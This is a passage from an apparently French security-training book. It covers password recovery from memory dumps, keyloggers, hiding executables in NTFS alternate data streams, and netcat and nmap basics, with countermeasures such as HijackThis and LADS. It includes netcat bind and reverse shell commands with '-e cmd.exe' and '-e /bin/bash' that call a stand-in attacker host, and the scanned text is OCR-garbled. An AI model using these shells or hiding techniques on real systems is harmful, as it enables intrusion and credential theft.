ordinateur, nous pouvons vérifier à l'aide de la commande cfdisk /dev/sdd 
que la première partition de notre clé a bien été transformée en une parti- 
tion de type PPC PreP Boot. 


cfdisk (util-linux-ng 2,14) 


Unité de disque! /dev/sdb 
Taille: 8086618112 octets, 8086 Mo 
Têtes: 249 Secteurs par piste! 62 Culindres: 1023 


Nom Fanions Part Type Type SF [Étią.] Taille (Mo 
morce Primaire FAT16 <32Ħ 

sdb2 Primaire PPC PReP Boot 1027,56 

sdb3 Primaire Venix 80286 1027,56 

sdbd Primaire Venix 80286 1027,56 

Inutilisable 4995,49 


Denda) [Bétruire ] [ Aide ] [Maximiser ] [ Afficher ] 
[ Quitter ] [ Type ] [ Unités ] [ Écrire 


Basculer le fanion d'amorce pour la partitien courante 


La partition venix 80286 est maintenant de type PPC PreP Boot. 


Toute la difficulté est maintenant de décrypter les données sauvegardées 
sur la clé. Nous utilisons sous Linux la commande strings qui permet d'af- 
ficher sur la console les caractères affichables d'un fichier binaire ou d'un 
flux. Nous redirigeons ensuite cette commande dans un fichier texte où il 
sera plus facile de trier les données. La commande strings /dev/sdb > 
dump_memory.txt permet cela. Il nous suffira ensuite de parcourir le 
fichier dumpmemory.txt à la recherche de chaînes de caractères de type pass- 
word, pass... 
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Cette technique peut être employée pour découvrir par exemple un mot de 
passe de bios qui pour certains est toujours stocké au même endroit 
mémoire ou une clé d'encryption de disque [16] (truecrypt). 


bash-3.2# strings /dev/sdb>dump_memory,txt 
bash-3,2# cat dump_memory,txt lgrep password 

Type the password and ,,, 

-- press <ENTER> to leave password security enabled, 
-- press (CTRLO<ENTER> to disable password security, 
Type the password and press <ENTER> 

Enter password: 

** Incorrect password, ** 

Number of unsuccessful password attempts: 

bash-3,2# 


La recherche de mot clé sur le fichier de la mémoire dumpée 


Il existe d'autres techniques de dump mémoire notamment via le DMA 
(Direct Access Memory), le principe restant le même. 


2.3.11Les keyloggers matériels et logiciels 


Nous ne pouvons pas parler de failles physiques sans parler des keyloggers, 
très faciles à installer dès que l'on a accès au matériel. Un keylogger maté- 
riel (littéralement enregistreur de touches) est un dispositif chargé d'enre- 
gistrer les frappes de touches du clavier à l'insu de l'utilisateur. Il s'agit donc 
d'un dispositif d'espionnage. Dans la mesure où les keyloggers enregistrent 
toutes les frappes de clavier, ils peuvent servir à des personnes mal inten- 
tionnées pour récupérer les mots de passe des utilisateurs du poste de 
travail ! Quelques secondes suffisent pour les installer et ils sont 
généralement très discrets. 
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Les keyloggers matériels 


Les keyloggers matériels s'installent très facilement ; il suffit, pour certains, 
de les installer sur la prise de branchement du clavier. Nous en trouvons de 
deux sortes, le type USB ou le type PS/2. Il existe également un troisième 
type, beaucoup plus discret mais qui demande quelques petits talents de 
bricolage, le KeyLogger Module. Un keylogger matériel modulaire destiné à 
être incorporé à l'intérieur du clavier USB ou PS/2. Des connexions univer- 
selles 2.5 mm garantissent une compatibilité totale. Une fois installé, ce 
keylogger est absolument invisible pour les yeux et pour des logiciels. 


Insérés entre clavier et UC, ils sont très discrets 
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Le keylogger modulaire est invisible 


Il existe de nombreux sites sur Internet où l'on vous explique comment bri- 
coler vous-même votre keylogger. 


Le mode opératoire des keyloggers est identique, qu'il soit matériel ou logi- 
ciel, même s'il existe une multitude de keyloggers différents. Les keyloggers 
se lancent directement au démarrage de la machine hôte. Une fois le key- 
logger lancé, il enregistre au fur et à mesure tout ce qui est frappé sur le 
clavier. Si la machine cible est pourvue d'une connexion Internet, le keylog- 
ger enverra discrètement, à une adresse e-mail ou à un serveur Internet, un 
fichier, généralement crypté, contenant tous les renseignements collectés. 
Ainsi l'espion aura tout le temps nécessaire pour retracer votre activité et 
sélectionner les éléments qui lui semblent utiles. 
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gmail.com 
rezor 
iexplore.exe 


Gmail : la messagerie de Google - Windows Internet 
Explorer 


14/06/2009 23:02:00 


acissi2008rezoracissi2°acissi20087rezor2008 
acissi2008 


Rapport de log du keylogger 


En fonction du keylogger sélectionné, différents écrans de configuration 
existent. Malgré tout ceux-ci se ressemblent, nous pouvons choisir quel 
type de touches intercepter, le chemin du fichier de log, les clics de souris, 
les popup, les copier-coller. Nous pouvons également définir les plages 
horaires qui nous intéressent. 


c:\ogfite.log 


Interface de configuration d'un keylogger 
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Nous avons également la possibilité de demander que des éléments impor- 
tants comme la date, les applications ouvertes et le choix ou non du cryp- 
tage du fichier de trace soient enregistrés. Le mot de passe réclamé par le 
keylogger permet d'assurer au pirate que lui seul pourra décrypter le fichier. 
Même si un utilisateur découvrait un fichier crypté il ne saurait reconnaître 
les éléments contenus à l'intérieur. 


TAME Bi aithi attest sua 


F Save window caption i 

F Add task name to window cel E Pava 
M Save test from window Le . T Reseed 
M Save edit lines from window — l FT ipeseved 
[V Encrypt LOG file ele el 


Password for encrypting: pers 


Edit lines to save: | 5 


Paramétrage des actions 


Selon le keylogger, il est possible de paramétrer l'option "auto-destruction" 
(Self-destruct). Il est alors impossible de remonter au programme et à 
l'espion qui se cache derrière. Il suffit de déterminer la plage en nombre de 
jours pendant laquelle le keylogger doit rester actif sur la machine cible 
pour qu'automatiquement le logiciel se détruise une fois le délai passé. 
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FA diiy Tati site titg 


Sel-destuct? When? | 


Approximate date: 
aviil 2001 ] 


lun. mar. mer. jeu. ven. sam. d 
1 26 2 28 23 A 3 


-can automaticall remove itself from system in a 
predefined time. Type it in editbox, located in bottom of 
this window. 


Days to live: p 


Fame Ee 


Auto-destruction 


2.3.12Contre-mesures aux keyloggers 


Les keyloggers s'exécutent au démarrage de la machine. Tout ralentisse- 
ment du système au lancement doit sembler suspect. Il est vrai qu'avec les 
nouvelles générations d'ordinateurs il est de moins en moins simple de 
noter ces ralentissements machines. En général les fichiers de récupération, 
cryptés ou non, sont stockés avec des noms très peu parlants dans C:\win- 
dows\temp. Il est intéressant d'aller tenter d'ouvrir les fichiers contenus 
dans ce répertoire, s'ils sont en clair nous comprendrons très vite ! 


Les keyloggers sont des outils particulièrement dangereux puisqu'ils per- 
mettent de récupérer les mots de passe et les noms d'ouverture de session 
des utilisateurs. Ils peuvent aussi être un outil de "surveillance" pour les 
entreprises (vérifier les activités réalisées par les salariés pendant les heures 
de bureau...). 
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L'utilisation d'un keylogger ne saurait être légale sans le consentement 
préalable du salarié. Sur un poste non connecté à Internet, l'installation 
d'un tel outil implique le passage du pirate sur la machine cible. Le meilleur 
moyen de prévention reste donc la vigilance, vérifier sa connectique, ne pas 
quitter son poste sans avoir au minimum verrouillé son écran, ne pas 
diffuser son mot de passe et s'assurer qu'il soit assez complexe. 


Quand nous découvrons un fichier suspect, la première mesure à prendre 
est de déconnecter la machine du réseau. Nous pourrons alors utiliser des 
programmes comme ProcDump pour afficher les tâches s'exécutant (généra- 
lement le gestionnaire des tâches ne voit pas les keyloggers). Un pro- 
gramme bien connu des initiés est le fameux « HijackThis ». HijackThis est 
un outil capable de détecter, entre autres choses, les programmes lancés au 
démarrage du système. Il nous permet de consulter tous les éléments et 
éventuellement de les retirer de l'ordinateur. Le logiciel peut également 
enregistrer des paramètres par défaut et ignorer certains éléments définis. 


Pour utiliser HijackThis, il faut d'abord le télécharger [17] puis nous crée- 
rons un dossier pour y placer HijackThis. Il est important de placer ce 
fichier dans un dossier qui lui est réservé car ce dossier sera utilisé pour les 
sauvegardes réalisées par HijackThis. 


Nous lançons ensuite l'exécutable hijackthis.exe. La première fois il affiche 
un écran d'accueil, il suffira de cocher la case Don't show this frame 
again when I start HijackThis pour ouvrir directement l'écran principal 
au démarrage. 
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F: Trend Micro HijackThis - v2.0.2 


Welcome to MijackThés, This program wit scan your PC and generate a log file of 
régstry and file settings commonly masipulated by mobrare as well as good 
softivare, 


Scan & Fix stuff | Other stuff 


i] | Uploadto TrendSense ARE RU HSE 


Info on selected item... | Main M | | / ; 3 | 


Le logiciel HijackThis 


La première chose à faire est de le paramètrer en appuyant sur le bouton 
Config et de cocher la façon dont nous voulons que HijackThis travaille. 
Pour que HijackThis examine notre ordinateur à la recherche de program- 
mes espions, cliquez sur le bouton Scan (balayer). Nous verrons alors s'affi- 
cher à l'écran une liste de tous les éléments trouvés par le programme. 


Analyser un tel résultat n'est certes pas évident. Il est possible de faire ana- 
lyser celui-ci sur des sites spécialisés [18] où il vous sera possible de coller 
ou envoyer par e-mail votre rapport et obtenir automatiquement une 
analyse de celui-ci. 
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HijackThis ne se contente pas d'analyser le fonctionnement de votre ordi- 
nateur, il peut aussi supprimer les processus que vous avez définis comme 
malveillants. Il suffit de les sélectionner et de cliquer sur le bouton Fix 
checked. 


F Trend Micro HijackThis - v2.0.2 


Below are the rests of the HjatkThis sean, Be carefu what you deleté with the Fix : 
checked button, Scen resis do not determme tether an kem ts bad or not. The 
best thing to do is to "Analy zel his’ and show the log file bo knowiedgeable Fole. 


[IRO - HELM\Softvrarel t4crosoft\internet Explorer \Main,Start Page = about:blank 
[O -HKCU Run: [ClipMates] C:\Program Fles\GpMates|ClpMate.ee 

Où + HECA.. Run: [DAEMON Tools] "C:Program FilestDAEMON Tools\dsemon.exe" lang 1034 

O4 -HCCUI- Run: [timon eke] C'\'WINOOWS \systemaÈtct£mon. exe 
[>09 - Extra button; Research » (92780B25-18CC-41C8-B9BE-3C9CS71A8263} - C:PRORA~ MICROS ~24Otfice 
1409 - Extra button: AIM -{AC3E2541-2814-1195-BC60-000000A 1 DE45} - C:Program FlesiAIM\sin.axe ; 

O9 - £xtré button: Fiddier - {CF819DA3-%882-4944-ADFS-6PFI7ECF3CEE} - C:\Program FilesiFid@sr\F der ex 
[1109 - Extra ‘Tools’ menukern: Fiddler - {CF8190A3-9882-4944-ADFS-6EF 1 7ECFSCE à « “C:\Program FilestFidderif 
[269 -Æxtrabutton: (m name) - {e2e2dd38-d088-4134-82b7-f2ba38496583) - C'IWIDOWS Network Cisgroit 
1 C9 - Extra Toots menuitem: @xpspôres dl, 20001 - {e2e2dd38.d0B8.41 44 42b7-F2ba 38406083} - CAWENDOW: 
[2016 - RFF: {17492023-C2M-4532€-A940-C7C58086F 700} (Windows Genuine Advantage Vaidation Tool) - http:f.. 
|: Ot6 - DPF: 46414512B-B978-451D-A0DB-FORF EE 833C} (WUWebControl Class) = http:/jupdste.mxrosoft.comy 
[5016 - OF: {82774781-8F4€-! ID1-ABLC-D000P67728F0} (OLG Class) - https:/Jtransfers.ds.mècrosoit. conf taf" 
17 C17 = MHEMSystemCOS (Services |Tcpip\Paramaters: Domain = Ehorhidomnet 

O17 - HE MiSoftware}. \Telepheny: DomainName = thorndoni.net 

Q17 -HKM System CCSiServices\Tepipl. \SCAGEBOB-ZADS-42A7-97 A 4-SCHREOAASC H j NameSi ver = 216.7 
L O1 -HEEM Syetan tS 2} Services| Tepp Paæareters: Domain = thorndomnet 

Q47 -HM Sy temic Services Tepp Pararetens: Doman = thorndom,net 
[ G22 - SharedTaskSchedufer: JE Component Categories cache daemon » 455385847.4922.de7e-R1C1-97140C1C1 
[7083 - Service: Adobe 114 Service - Unknown owner - ‘Program Fles\Common Fles\Adobe Systems ShxwedSery 
[2023 » Service; AH HotKey Poller - ATI Technologas Inc, - C'AWINDOWS'isystema2iñtiauxx.exs 
DIOR - Service: ATI Smart - Unom owner - CAWINDOWS\systemi22tati259a0.05%e re 


-~r E O, € de PL 


sekg_| fu checkea| | ae || io | a | 


| pof F ý p f 
Infoon selectedtem.… | | re | | | Add dhkindto ignoret | | 


Corriger les problèmes avec HijackThis 


Une autre fonction intéressante de HijackThis est qu'il est capable de créer 
une liste des éléments de démarrage, un keylogger se lançant au démarrage, 
ce peut être une façon de le repérer. À partir de l'écran principal, nous cli- 
quons sur config-Misc Tools puis sur Generate StartupListlog. Le pro- 
gramme va automatiquement ouvrir un éditeur de texte qui contient les 
éléments de démarrage de notre ordinateur. 
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Nous ferons un Copier-Coller de ces éléments dans un message que nous en- 
voyons sur l'un des deux sites d'analyse. Parfois nous pouvons rencontrer 
un fichier qui refuse obstinément d'être supprimé par les moyens conven- 
tionnels. HijackThis inclut, depuis la version 1.98.2, une méthode pour que 
Windows supprime le fichier lorsqu'il démarre, avant que le fichier n'ait eu 
la moindre chance de se lancer. Cela se fait très simplement en cliquant 
d'abord sur le bouton Config de l'écran d'accueil puis sur le bouton Misc 
Tools de l'écran suivant et enfin sur le bouton Delete a file on reboot. 
Une fenêtre s'ouvre alors et nous n'avons qu'à sélectionner dans l'arbores- 
cence système le fichier que nous désirons supprimer en cliquant sur le 
bouton Ouvrir de la fenêtre. Une fenêtre popup s'ouvre alors nous 
demandant de redémarrer l'ordinateur. 


+: Configuration 


f Main | ignoretist | Backups | etse Tools 


StartupList (integrated: v1.52) 


Generate StartupList log | F List also minor sections (full) 
Re me JT List empty sections (complete): 


System tools 


Opens a small process manager, working 
__Openproces manager | PRE ne 


Open hosts file manager | Opens an editor for the hosts fée, 


If a fde cannot be removed from memory, 
Delete a file on reboot... Windows can be setup todalete it when 
the system is restarted. 


s Delste a Windows NT Service:(023). USE 
__ Dekte an NT serve. | ORACAUTON CMNNT4I2KRR ony) 


Open the rtegrated ACS Spy utiy to 
__ CpnAnsspy. | scan for hidden data streamsi 


Open Uninstall Manager Open a 1tfity to manage the tems in the 
a i AddjRemove Software bst. ` 


SAVE | Fix checked ___ Anéteeïhs | 
RS SRE | Upload to FrendSecure 


Créer une liste des process lancés au démarrage 
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2.3.13Les flux ADS 


ADS est un acronyme qui signifie Alternate Data Stream [19]. Nous pour- 
rions le traduire par flux de données additionnels. Cette technique ne 
concerne que les systèmes de gestion de fichiers NTFS. Elle consiste à ajou- 
ter à un fichier ou un dossier, un nouveau flux de données. En temps nor- 
mal on n'accède qu'à un seul flux de données. NTFS offre la possibilité d'en 
ajouter un ou plusieurs à un même fichier. Ces flux additionnels sont en 
quelque sorte des métadonnées, qui sont complètement invisibles ! 
C'est-à-dire qu'avec l'explorateur de Windows vous n'avez aucune chance 
de les détecter. Il faut aussi noter que ces flux peuvent être de tout type, 
pas seulement du simple texte, mais également des images et même des 
exécutables ! Le principal risque au niveau de la sécurité est que les ADS 
soient complètement cachés. Ceci offre une possibilité pour des chevaux de 
Troie, virus ou autres spywares d'en tirer un avantage certain. 


Passons à la pratique. 


Sous Windows, lançons un terminal et créons le fichier Exemple.txt avec la 
commande notepad Exemples.txt, écrivons le texte suivant : « voici quel- 
ques données pas très importantes » et enregistrons le fichier. 


Ajoutons ensuite un flux ADS en tapant dans la console dos la commande 
echo "Données secrètes" > Exemple.txt:1234.txt. 


cU C'WINDOWStsystem32\cmd.exe 


:\Testsdecho "Données Secrètes” > Exemple.txt:1234.txt 
INTests >. 


Création d'un flux ADS 
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Le flux a été attaché au fichier Exemple.txt, celui-ci semble ne pas avoir 
changé, notepad n'affichera que son contenu, son poids (en Ko) ne change 
pas et même une somme mds faite avant et après la manipulation reste 
inchangée ! Mais si nous tapons notepad Exemple.txt:1234.txt nous verrons 
alors apparaître le texte données secrètes (à l'encodage prêt !) 


: 
{ 
Le 


Visualisation du flux ADS 


Maintenant cachons une image dans un flux ADS et supprimons l'original. 
Copions tout d'abord une image du répertoire Images de notre profil vers la 
racine du système C: \ Nous choisissons pour l'exemple Coucher de 
soleil.jpg. 


Lançons comme dans la manipulation précédente une console dos. Pla- 
çons-nous à la racine avec la commande cd\. 


Nous créons ensuite notre flux ADS avec la commande type "Coucher de 
soleil.jpg">:secret.jpg. 


Nous supprimons ensuite l'image d'origine avec la commande del Coucher 
de soleil.jpg. Tapons ensuite la commande dir pour vérifier que l'image a 
bien été supprimée puis la commande mspaint :secret.jpg et là, surprise, 
l'image que nous avons supprimée est bien présente dans le flux ADS et 
s'affiche. 
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| W secret - Paint 


iN?) 
: type "Coucher de soleil.jpg">:secret.jpy 


“dir 
Le volume dans le lecteur C n’a pas de nom. 
f Le numéro de série du volume est 7894-0807 


Répertoire de C:N 


B NUTOEXEC.BAT 
Ø CONFIG.SYS 
71i 189 Coucher de sole 
<REP> Docunents and $ 
105 542 Hiver. jpg 
14 log.txt 
Program Files 
MINDOUS 
5 fichierCs) 176 745 octets 
3 Rép<s> 8 675 577 856 octets libr 


:\ddel "Coucher de soleil.jps'" 
:NDmspaint :secret.jps 
IC: dir 


Le volume dans le lecteur G n’a pas de nom. 
| Le nunéro de série du volume est 7894-8887 


| Répertoire de C:N 


B AUTOEXEC.BAT 
Ø CONFIG.SYS 
: CREP> Docunents and 8 
5/08/2004 :68 185 542 Hiver.jpg 
5/06/2889 16: 14 Jlog.txt 
8/03/2409 $ <REP> Program Files 
{#1870372009 : <REP> MONTRE RTE 


) 85 556 octets 
8 675 651 584 octets lin] fE eeseRessnennns 


4 §Pour pren ps l'aide, sélectionnez. Toption Rubriques dade dui 


Image cachée dans un flux ADS 


Nous allons maintenant cacher un exécutable dans un flux ADS. Créons 
tout d'abord un fichier test.txt dans une console dos à l'aide de la com- 
mande notepad test.txt puis cachons un exécutable (calc.exe) dans un 
flux ADS attaché à ce fichier à l'aide de la commande type %SystemRo- 
ot\system32\calc.exe>test.txt:calc.exe. 


Dans la console, saisissons start c:\test.exe:calc.exe et... la calculatrice se 
lance ! Nous venons de cacher un exécutable dans un flux ADS. 
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oft Windows XP [version 5.1.26401 
<C> ec RURIIRE 1985-2001 Microsoft Corp. 


:\Documents and Settings \fdministrateurdced ciN 


| . | 
:Vtype 2SystemRaoot:\systen32Ncalc.exe>ci\test.txt:calc.exe 


De ci\test.txt:calc.exe [wc] CGJ JE) 
M LOC 
posman 
coveses 


Exécutable caché dans un flux ADS 


Nous allons maintenant ouvrir un port en écoute sur notre machine via un 
flux ADS. Netcat est un utilitaire surnommé le couteau suisse TCP/IP. Par- 
mi ses nombreuses fonctions, il permet d'initier une connexion sur un port 
de votre choix. Nous pouvons nous le procurer facilement, une simple 
recherche Google du type "Netcat pour Windows" s'affiche pour le 
télécharger. 


Ouvrons une console dos et créons un fichier log2.txt (notepad log2.txt). 
Nous aurons pris soin, au préalable, de placer le fichier nc.exe (exécutable 
netcat) dans le répertoire C:\WINDOWS\system32\. Entrons ensuite dans 
la console dos la commande type %SystemRoot%\system32\ 
nc.exe>c:\log2.txt:nc.exe pour attacher notre flux ADS. 


Tapons ensuite start c:\log2.txt:nc.exe -L -p 6666 -d -e cmd.exe pour 
ouvrir le port 6666 sur lequel une console Windows écoutera. 


| ct Invite de commandes 


:Gtype zSystemRootzNsystem32^\nce .exe>c:N\Nlog2.txt:nc.exe i 
start c:\log2.txt:nc.exe -L -p 6666 -d -e cmd.exe 


Ouverture d'un port vers l'extérieur via un ADS 


En nous connectant d'une autre machine sur le port 6666 avec netcat, nous 
nous rendons compte que nous sommes bien connectés sur une console 
Windows. Dangereux non ?! 
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Alfrezor@iutmph43 “]$ ne 195,221,189,123 6666 
Microsoft Windows XP [version 5,1,2600] 
(C) Copyright 1985-2001 Microsoft Corp. 


C:Vdir 

dir 

Le volume dans le lecteur C n'a pas de nom, 
Le numro de srie du volume est 7094-8887 


Rpertoire de C!\ 


18/03/2009 17:35 O AUTOEXEC,BAT 
18/03/2009 17:35 0 CONFIG,SYS 
18/03/2009 18:45 <REP> Documents and Settings 
05/08/2004 14:00 105ÿ542 Hiver, jpg 
15/06/2009 10:00 14 log.txt 

15/06/2009 11:39 45 log2,txt 


E 15/06/2009 11:04 <REP> Program Files 
{15/06/2009 10:59 8 test,txt 
{15/06/2009 11:04 <REP> WINDOWS 

4 6 Fichier(s) 105ÿ609 octets 
3 Rpis)  8ÿ658ü911ÿ232 octets libres 


Connexion sur le port ouvert 


2.3.14Contre-mesures aux flux ADS 


Microsoft ne fournit pas d'outil ou d'utilitaire par défaut pour détecter la 
présence d'ADS. Un très bon outil en ligne de commande pour détecter les 
ADS est LADS écrit par Franck Heyne [20]. 


Nous téléchargeons LDAS et nous devons le dézipper car il se présente sous 
la forme d'un fichier compressé lads.zip. Les utilitaires Winzip ou 7zip 
font cela très bien et de nombreux tutoriels sont disponibles sur Internet. 


Après décompression, nous copions le fichier lads.exe dans 
c:\WINDOWS\system32\. Le lancement du scan se fait simplement avec la 
commande lads c:\ /S. 
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ADS -— Freeware version 4.10 

<C> Copyright 1998-2007 Frank Heyne Softuare Chttp://uuu.heuysoft.de) 

fhis program lists files with alternate data streams (ADS) H 
se LADS on your oun visk? _| 


canning directory ciN 


size ADS in file 


71189 c:\:secret.jps 
71189 c:\N:test.jpy 
71189 c:\N:toto.jpy 
26 c:\HidackThis.exe:Zone.Identifier 
347648 c:\log.txt:mspaint.exe 
B c:\log2.txt:backup.exe 
61448 c:\log2.txt:nc.exe 
rror 32 opening c:\pagefile.sys 
115288 c:\test.txt:calc.exe 
The following sunmary might be incorrect because there was at least one error? 
737881 bytes in 8 ADS listed 


:\Documents and Settings \Administrateur> ma Ral 


Détection des ADS avec l'utilitaire Lads 


Un autre utilitaire qui lui s'exécute dans une interface graphique est 
Stream Explorer. Nous ne ferons aucun commentaire car l'interface parle 
d'elle-même ! 


Stream Explorer 


Bureau i| Nom > Streams 
1) Mes documents < ||] © Documents and Settings | AN 4 

4 Poste de travail Program Files LÀ <default> 

E Ah Disquette 34 (A) | | Gwnnows | ai 


<æ Disque local {C:) M i 
fs Documents and £ = | Hiver | ali nc.exe 
{E} log i 


# 
E3 Program Files 

SE) WINDOWS | B bo? 
Ÿ VirtualBox Guest Add ! 


Panneau de configur. 
{2 Documents partagés 
LA Documents de Admin 
‘3 {7 Documents de igi 
> 


| 
| 
f 


ER. re 


Caa ONE a o en 


Détection des ADS avec l'utilitaire Stream Explorer 
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Un logiciel dont nous avons déjà parlé précédemment détecte lui aussi les 
flux ADS mais en plus permet de les supprimer, il s'agit de HijackThis et 
de sa fonction ADS Spy. Pour utiliser l'utilitaire ADS Spy, lancez Hijack- 
This puis cliquez sur le bouton Config. Cliquez ensuite sur le bouton 
Misc Tools (Outils divers) et enfin sur le bouton ADS Spy, il suffira 
ensuite de les sélectionner et de cliquer sur le bouton Remove selected 
pour les enlever. 


F Trend Micro HijackThis - v2.0.2 


; Configuration res 


| Main | ionorelist | Backups || Misc Tools 


j 


| ADS Spy 


| F Qik sean (Windows base Éokder onip} What's this? | Help | 


#2 Ignore safe system info streams 
F Cakufate MOS checksum of streams 


| | Ready, 


[| Stan | Save log... | Remove selected | Back | 

phant ft s peeo = p Other stuff m 
| | AnalyzeThis | | 
| - sis | fimchecked] || es | me | tk || 


Suppression des ADS avec HijackThis 
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3. Conclusion 


Tout au long de ce chapitre, nous avons pu vérifier combien il pouvait être 

dangereux de laisser libre accès à son ordinateur, que ce soit le vol de mot 

de passe ou l'injection de programmes malveillants tout est possible dès 

que l'accès à la machine est autorisé et la liste des possibilités est encore 

longue. L'important est d'être sensibilisé à ce problème et de respecter les 

règles de bon sens suivantes : 

- Protéger le bios de notre machine et mettre un mot de passe sur le boot. 

- Avoir un mot de passe intégrant une notion de complexité (alpha-numé- 

rique + caractères spéciaux). 

Interdire le boot sur autre chose que le disque dur. 

- Verrouiller son ordinateur dès que nous nous absentons, voire l'arrêter si 
notre absence doit durer. 

- S'assurer de la mise à jour de nos antivirus et autres anti-spyware. 


Si nous respectons ces règles, bien des ennuis nous seront évités. 


4. Index des sites Web 


[1] http//www.passwordone.com/content/view/81/2/ 

[2] http://www.backtrack-fr.net 

[3] http://www.openwall.com/john/ 
http://dawal.chrysalice.org/article.php3’id_article=48 
http://wiki.backtrack-fr.net/index.php/John_The Ripper 
[4] http://www.securinfos.info/wordlists-dictionnaires.php 
[5] http//www.openwall.com/john/doc/RULES.shtml 

[6] http://www.sebsauvage.net/comprendre/encryptage/ 
http://www.bugbrother.com/security.tao.ca/crypt.html 

[7] http://www.korben.info/120-g0-de-rainbow-tables.html 


[8] http://www.freerainbowtables.com/fr/ 
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[9] http//www.oxid.it/downloads/winrtgen.zip 

[10] http://wiki.mandriva.com/fr/GRUB,_le_manuel 

[11] http://sandisk.fr/Retail/Default.aspx?CatID=1450 

[12] http://www.gmgsystemsinc.com/fau/ 

[13] http://www.icewalkers.com/download/syslinux/170/dls/ 
[14] http://www.mcgrewsecurity.com/tools/msramdmp/ 

[15] http://www.mcgrewsecurity.com/tools/msramdmp/ 
[16] http://citp.princeton.edu/memory/ 

[17] http//www.bleepingcomputer.com/files/hijackthis.php 
[18] http//www.hijackthis.de/fr 
http://www.bleepingcomputer.com/forums/forum22.html 
[19] http://manumation.developpez.com/articles/windows/ads/ 


[20] http//www.heysoft.de/en/software/lads.php 
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Chapitre 5 
Les failles réseaux 


Généralités 

Les réseaux actuels sont basés sur des normes qui datent de la création 
d'Internet. Même si ces normes ont été extrêmement bien pensées, il réside 
toutefois des problèmes exploitables. L'apparition de nouveaux supports 


sans fil tel que le Wi-Fi devenu incontournable en moins de 5 ans a aussi 
ouvert des brèches. 


Les failles réseaux touchent donc le simple particulier comme la grande 
entreprise mondiale. Ce chapitre nous aidera à appréhender ces différents 
aspects. 


Rappel sur les réseaux TCP/IP 


Adressage IP 


Sur Internet et les réseaux en général, chaque ordinateur communique avec 
les autres via un numéro d'identification unique : l'adresse IP (Internet Proto- 
col), cette adresse est constituée de 4 nombres de 0 à 255, sous la forme 
XXX.XXX.XXX.XXX 
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par exemple : 174.127.3.14 


L'espace d'adressage est divisé en deux : l'adressage public et privé. 


Adresse IP privée 


Chaque entreprise peut créer son réseau en utilisant les plages d'adresses 
suivantes : 


10.0.0.0 à 10.255.255.255 
17216004 172:51255:255 
192:168.0:0:à-192. 168.255.255 


Adresse IP publique 


Les adresses IP publiques sont gérées par l'ICANN. Cet organisme attribue 
les adresses IP. Les adresses non incluses dans les adresses ci-dessus sont 


publiques. 


Client/Serveur 

Posséder une adresse IP est intéressant, mais comment échanger des infor- 
mations maintenant que nous connaissons l'adresse d’un ordinateur ? 
L'architecture client(s)/serveur est la réponse : 


Le(s) client(s) contacte(nt) l'adresse IP du serveur et se connecte(nt) à un 


service : HTIP, FTP, POP par exemple. 


Il existe deux types de connexions : 
- ICP (Transmission Control Protocol) : protocole en mode connecté. 
- UDP (User Datagram Protocol) : protocole en mode non connecté. 


Les services sont répartis sur des ports de 1 à 65535. 


Voici une liste non exhaustive des services les plus connus. 


Type Service 


21 TGP FLE 
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Port Type Service 
22 TCP SSH 
23 TCP |TELNET 
25 TCP [SMTP 
53 [Tcro [DOMAIN 
80 TCP HTTP 
110 TCP POP3 
143 TCP [IMAP 
443 TCP [HTTPS 
993 TCP [IMAP over SSL 
6667 TCP IRC 


Outils pratiques 


Cette partie rassemble différents utilitaires permettant de nous forger un 
couteau suisse, ces outils simples et pratiques sont toujours à avoir sous la 
main. 


Des informations sur les sockets 


Netstat permet de connaître les services et ports ouverts sur votre machine, 
ainsi que les différents états des connexions. 


Lancez netstat -a 


Les états : 

- ESTABLISHED : connexion établie 

- SYN_SENT & SYN_RECV : connexion en cours d'établissement 
- CLOSE : socket fermé 

- CLOSE_WAIT : socket en attente de fermeture 

- LISTEN : un service est ouvert sur ce port. 
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Isof permet de lister tous les fichiers ouverts, tout étant fichier sous Linux, 
les sockets ne font pas exception à la règle. 


Isof -ni tcp Liste toutes les connexions avec le PID et le nom de la 
commande. 


Cet outil peut être très utile afin de connaître quel programme ouvre des 
sockets sur votre ordinateur. 


Scanner de port TCP 


Nmap est un scanner de port TCP, cet outil incontournable permet de 
scanner un hôte ou un réseau afin de déterminer si des machines sont pré- 
sentes, quels ports sont ouverts et même de trouver le système d'exploita- 
tion cible. 


Installation de nmap sous Debian : apt-get install nmap 


nmap -sP 192.168.0.1 Permet de scanner tous les ports de l'adresse 
192.168.0:1: 


nmap -sP 192.168.0.0/24 Permet de scanner tous les ports des 
254 adresses du réseau 192.168.0.0. 


nmap -sP 192.168.0.1/100 Permet de scanner tous les ports de la plage 
d'adresses 192.168.0.1 à 192.168.0.100. 


L'option -p permet de tester un port TCP. 


nmap -p 80 192.168.0.1-10 Permet de connaître quelle machine a le port 
80 d'ouvert parmi les adresses IP de 
192.168.0.1 à 10. 


L'option -O -osscan-guess permet de trouver le système d'exploitation 
cible. 
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Netcat 


Netcat permet de créer soit un client soit un serveur. Ce programme per- 
met de faire rapidement de l'envoi de fichiers, de créer une porte dérobée, 
des ordinateurs zombies et bien plus, et ce, sans avoir besoin de recourir à 
un langage. 


Un Telnet en deux lignes : les deux lignes ci-dessous permettent de 
prendre le contrôle à distance d'un serveur via bash. 


Le serveur 

nc -l -p 5600 -e /bin/bash 
Le client 

nc localhost 666 


Reverse Telnet : les deux lignes ci-dessous permettent de prendre le con- 
trôle à distance d'un ordinateur sur un réseau privé connecté à Internet. 


Le serveur 

nc -l -p 666 

Le client 

nc ipduserveurpirate 666 -e /bin/bash 


BRemarque 


cryptcat est un clone de netcat avec des fonctionnalités de cryptage. 


SSH 


SSH (Secure Shell) est le remplaçant du Telnet. Son protocole sécurisé per- 
met de ne pas laisser passer d'informations sensibles comme le mot de 
passe. 


Une utilisation basique de ssh se résume à se connecter à distance sur une 
machine de la façon suivante : 


ssh root@mamachine 
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3.5 Tunnel SSH 


Nous sommes sur un hotspot qui ne permet d'accéder qu'au port 80, nous 
ne pouvons que voir des pages Web, impossible de récupérer notre courrier, 
aller sur IRC... Si notre serveur distant a un port 80 d'ouvert avec ssh 
dessus, il est possible d'y accéder, et de récupérer le socket distant en local. 


Nous avons un serveur Proxy installé sur le port 3128. 


ssh -L 3128:127.0.0.1:3128 root@mamachinedistante 


Avec la commande ci-dessus, nous venons de créer un tunnel ssh. 


Sur notre machine locale, nous avons le port 3128 d'ouvert qui n'est que le 
serveur proxy distant. Il suffit de configurer les clients mails, IRC... afin 
d'utiliser le proxy qui a pour adresse : 127.0.0.1:3128. 


Toutes les communications sur le port 3128 ont pour avantage d'être sécu- 
risées par SSH, cela peut donc être très utile lorsque l'on se situe sur un 
réseau non sûr. 


Dos et DDoS 


